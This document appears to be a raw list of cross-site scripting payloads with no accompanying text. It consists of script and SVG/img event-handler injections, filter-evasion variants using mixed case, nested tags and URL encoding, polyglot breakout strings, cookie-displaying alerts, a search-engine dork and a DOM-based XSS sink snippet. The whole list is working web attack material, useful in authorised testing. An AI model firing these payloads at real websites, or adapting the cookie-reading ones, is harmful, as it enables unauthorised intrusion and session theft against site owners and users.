1zqjlt/'"(){}<x>:1zqjlt;9/"*/confirm`XSS POC H1`</Script/--><Script>/*

indo"><svg/onload=alert(document.domain);>"dax

rootbakar<!'/*"/*\'/*\"/*--></Script><Image Srcset=K */; Onerror=alert(document.domain) //>

'%22()%26%25<acx><ScRiPt%20>prompt(974790)</ScRiPt>

site:urbandictionary.com inurl:alert(document.domain)>

"><img src=x onerror=prompt(1)>.jpg

"><svg onload=alert("1")>

postimage.org

<svg onload=alert(hi)>

test';alert('XSS');'

""--!><Svg/OnLoad=(confirm)(/xss/)>

""--!><Svg/OnLoad=(confirm)(document.domain)>

<img/src='#'/onerror=alert(1);>

<img/src='#'/onerror=alert(document.cookie);>

<script>alert(1);</script>

<img src='#' onerror=alert(1);/>

<script>alert(123)</script>

"><script>alert(document.cookie)</script>

" onfocus="alert(document.cookie)

"><script >alert(document.cookie)</script >

"><ScRiPt>alert(document.cookie)</ScRiPt>

"%3cscript%3ealert(document.cookie)%3c/script%3e

<scr<script>ipt>alert(document.cookie)</script>

aaa@aa.com"><script>alert(document.cookie)</script>

aaa@aa.com%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

t" onmouseover=alert(/xss/); a="

<script>
var pos=document.URL.indexOf("message=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</script>

<svg/onload=alert(1)>
